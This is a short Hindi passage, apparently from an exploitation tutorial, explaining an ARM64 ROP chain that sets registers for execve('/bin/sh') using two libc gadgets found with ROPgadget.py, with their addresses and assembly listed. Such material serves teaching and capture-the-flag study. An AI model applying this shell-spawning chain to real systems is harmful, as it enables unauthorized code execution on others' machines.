सिस्टम कॉल के लिए कॉल को तैयार करने के लिए निम्नलिखित कॉन्फ़िगरेशन की आवश्यकता है:
x8: 221 सिस_execve को निर्दिष्ट करें
x0: "/bin/sh" के पते को निर्दिष्ट करें फ़ाइल को निष्पादित करने के लिए
x1: 0 कोई तर्क नहीं पारित करने को निर्दिष्ट करें
x2: 0 कोई पर्यावरण चर नहीं पारित करने को निर्दिष्ट करें
ROPgadget.py का उपयोग करके मैंने मशीन की libc पुस्तकालय में निम्नलिखित गैजेट्स का पता लगाया:
;Load x0, x1 and x3 from stack and x5 and call x5
0x0000000000114c30:
ldp x3, x0, [sp, #8] ;
ldp x1, x4, [sp, #0x18] ;
ldr x5, [sp, #0x58] ;
ldr x2, [sp, #0xe0] ;
blr x5
;Move execve syscall (0xdd) to x8 and call it
0x00000000000bb97c :
nop ;
nop ;
mov x8, #0xdd ;
svc #0
पिछले गैजेट्स के साथ हम स्टैक से सभी आवश्यक रजिस्टर को नियंत्रित कर सकते हैं और x5 का उपयोग करके सिस्टम कॉल करने के लिए दूसरे गैजेट पर जाने के लिए कर सकते हैं।
ध्यान दें कि इस जानकारी को libc पुस्तकालय से जानने से रेट2libc हमला भी किया जा सकता है, लेकिन चलते हैं इस वर्तमान उदाहरण के लिए।